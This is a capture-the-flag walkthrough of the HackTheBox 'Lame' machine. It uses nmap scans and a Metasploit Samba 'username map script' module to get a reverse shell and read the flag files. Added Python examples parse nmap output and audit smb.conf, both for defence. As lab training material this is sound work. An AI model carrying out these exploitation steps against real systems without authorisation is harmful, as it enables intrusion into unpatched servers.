neiwad_

[HTB] Machine - Lame

Step 1: preparation

  1. Connect to the VIP HTB VPN
  2. Add an $IP variable to the shell for faster operation

IP=10.10.X.X
echo $IP

Step 2: enumeration

I first start with a basic nmap scan

nmap $IP

This scan returns "Host seems down. If it is really up, but blocking our ping probes, try -Pn".

So I retry with that flag

nmap -Pn $IP

This time it reports 4 open ports

[image: nmap basic scan result]

Given that, I run a more detailed (and longer) scan with version detection and the default scripts

nmap -Pn -sV -sC $IP

[image: nmap precise scan]

I can see that vsFTPd is on version 2.3.4 and samba is on version 3.0.20.

That should be enough to move on to exploitation.
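The version strings that the detailed scan exposes are the whole basis of the next step, so it is worth knowing how to pull them out of nmap's output mechanically: the same parse lets a defender sweep their own hosts for the two end-of-life versions this writeup singles out. The following Python is an added example, not part of the original post; the scan text inside it is constructed to resemble the Lame scan rather than copied from it, and the watchlist contains only the versions named above.

```python
"""Parse the port table of `nmap -sV` normal output and flag service
versions on a watchlist. Added example (not the post author's code);
SAMPLE_SCAN is a constructed scan, not a real capture."""
import re

# Constructed sample of `nmap -Pn -sV -sC` normal output (not a real scan).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.X.X
Host is up (0.050s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux
"""

# One port line of nmap's normal output: "PORT/PROTO STATE SERVICE VERSION".
# Script-output lines start with "|" and the table header with "PORT",
# so neither matches.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Version strings the writeup identified, keyed by nmap's SERVICE column.
# Matching is a case-insensitive substring check on the VERSION column.
WATCHLIST = {
    "ftp": ["vsftpd 2.3.4"],
    "netbios-ssn": ["Samba smbd 3.0.20"],
}


def parse_ports(scan_text):
    """Return one dict per port line: port (int), proto, state, service, version."""
    results = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            results.append(entry)
    return results


def flag_versions(ports, watchlist=WATCHLIST):
    """Return (port, version) pairs whose VERSION column contains a watched string."""
    hits = []
    for p in ports:
        for needle in watchlist.get(p["service"], []):
            if needle.lower() in p["version"].lower():
                hits.append((p["port"], p["version"]))
    return hits


if __name__ == "__main__":
    for port, version in flag_versions(parse_ports(SAMPLE_SCAN)):
        print(f"port {port}: {version}")
```

Note that the 139/tcp line carries nmap's generic "3.X - 4.X" range and is correctly not flagged; only 445/tcp, where the banner gives the exact 3.0.20 build, produces a hit. Run against your own `nmap -sV` output, the same parser gives an inventory of exposed versions to compare with vendor advisories.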

Step 3: exploitation

Samba 3.0.20

A quick search in msfconsole gives me a result named Samba "username map script" Command Execution.

[image: msfconsole samba result]

So I use this module and check which options are available

msf > use 0
msf > show options

[image: samba exploit options]

RHOSTS is empty and required, so I set it

msf > set RHOSTS $IP
(replace $IP with the real target IP, msfconsole does not expand shell variables)

NOTE: LHOST needs to be set to the address of your HTB VPN tun interface, not your local IP.

And then I launch the exploit

msf > exploit

[image: exploit reverse shell]

I now have a reverse shell!

cd home
ls
- ftp
- makis
- service
- ...
cd makis
ls
- user.txt
cat user.txt

The user flag is done.

For root, I go back to the root of the filesystem, navigate to the root folder and read the root.txt file.
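The module used above takes its name from the smb.conf option it depends on, `username map script`, which is a real Samba global parameter: affected 3.0.x builds let a crafted username reach the configured script as shell input, so a box that never sets the option is not exposed through this path. A quick way to see whether one of your own Samba hosts has the setting is to parse smb.conf and report it. The Python below is an added example, not part of the original post; the config fragment inside it is constructed, and the script path in it is a placeholder.

```python
"""Audit a Samba smb.conf for the `username map script` global option.
Added example (not the post author's code); SAMPLE_SMB_CONF is a
constructed config and its script path is a placeholder."""
import re

# Constructed smb.conf fragment with a [global] section that sets the option.
SAMPLE_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    server string = %h server (Samba, Ubuntu)
    ; a comment line
    # another comment
    Username Map Script = /etc/samba/scripts/mapusers.sh
    security = user

[tmp]
    path = /tmp
    writable = yes
"""

SECTION_RE = re.compile(r"^\[(?P<name>[^\]]+)\]$")
PARAM_RE = re.compile(r"^(?P<key>[^=;#][^=]*?)\s*=\s*(?P<value>.*?)$")


def normalise_key(key):
    """Samba is forgiving about case and internal whitespace in parameter
    names, so 'Username Map Script' and 'username map script' are the same
    parameter; fold both to 'usernamemapscript'."""
    return re.sub(r"\s+", "", key).lower()


def parse_smb_conf(text):
    """Parse smb.conf into {section_name: {normalised_key: value}}.
    Blank lines and ';' or '#' comment lines are skipped."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, {})
            continue
        m = PARAM_RE.match(line)
        if m and current is not None:
            sections[current][normalise_key(m.group("key"))] = m.group("value")
    return sections


def audit(conf):
    """Return a list of findings (strings); empty means nothing to report."""
    findings = []
    script = conf.get("global", {}).get("usernamemapscript")
    if script:
        findings.append(
            f"[global] sets 'username map script' = {script!r}: remove the option "
            "unless it is needed, and run a Samba release that is not affected"
        )
    return findings


if __name__ == "__main__":
    for finding in audit(parse_smb_conf(SAMPLE_SMB_CONF)) or ["no findings"]:
        print(finding)
```

The parser is deliberately minimal (no `include =` handling, no `%` macro expansion), which is enough for a local check of the file as written; `testparm -s` from the Samba package prints the effective configuration if you need to account for includes first.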

Step 4: that's it

If you want to subscribe to the HackTheBox Academy, you can use my referral link!
